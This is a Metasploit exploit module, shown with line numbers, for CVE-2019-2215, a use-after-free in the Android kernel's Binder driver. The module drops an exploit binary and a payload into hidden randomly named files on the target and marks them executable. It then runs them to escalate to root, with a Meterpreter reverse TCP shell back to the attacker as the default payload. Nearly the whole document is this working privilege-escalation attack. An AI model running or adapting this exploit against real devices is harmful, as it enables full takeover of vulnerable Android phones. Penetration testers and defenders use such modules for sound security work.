Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Common
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        {
19
          'Name' => "Android Binder Use-After-Free Exploit",
20
          'Description' => %q{
21
            This module exploits CVE-2019-2215, which is a use-after-free in Binder in the
22
            Android kernel. The bug is a local privilege escalation vulnerability that
23
            allows for a full compromise of a vulnerable device. If chained with a browser
24
            renderer exploit, this bug could fully compromise a device through a malicious
25
            website.
26
            The freed memory is replaced with an iovec structure in order to leak a pointer
27
            to the task_struct. Finally the bug is triggered again in order to overwrite
28
            the addr_limit, making all memory (including kernel memory) accessible as part
29
            of the user-space memory range in our process and allowing arbitrary reading
30
            and writing of kernel memory.
31
          },
32
          'License' => MSF_LICENSE,
33
          'Author' => [
34
            'Jann Horn', # discovery and exploit
35
            'Maddie Stone', # discovery and exploit
36
            'grant-h',      # Qu1ckR00t
37
            'timwr',        # metasploit module
38
          ],
39
          'References' => [
40
            [ 'CVE', '2019-2215' ],
41
            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
42
            [ 'URL', 'https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html' ],
43
            [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
44
            [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
45
          ],
46
          'DisclosureDate' => '2019-09-26',
47
          'SessionTypes' => [ 'meterpreter' ],
48
          'Platform' => [ "android", "linux" ],
49
          'Arch' => [ ARCH_AARCH64 ],
50
          'Targets' => [[ 'Auto', {} ]],
51
          'DefaultOptions' => {
52
            'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
53
            'WfsDelay' => 5,
54
          },
55
          'DefaultTarget' => 0,
56
          'Compat' => {
57
            'Meterpreter' => {
58
              'Commands' => %w[
59
                stdapi_fs_getwd
60
              ]
61
            }
62
          },
63
        }
64
      )
65
    )
66
  end
67

68
  def upload_and_chmodx(path, data)
69
    write_file path, data
70
    chmod(path)
71
    register_file_for_cleanup(path)
72
  end
73

74
  def exploit
75
    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit")
76
    exploit_data = File.read(local_file, mode: 'rb')
77

78
    workingdir = session.fs.dir.getwd
79
    exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
80
    upload_and_chmodx(exploit_file, exploit_data)
81
    payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
82
    upload_and_chmodx(payload_file, generate_payload_exe)
83

84
    print_status("Executing exploit '#{exploit_file}'")
85
    result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
86
    print_status("Exploit result:\n#{result}")
87
  end
88
end
89

90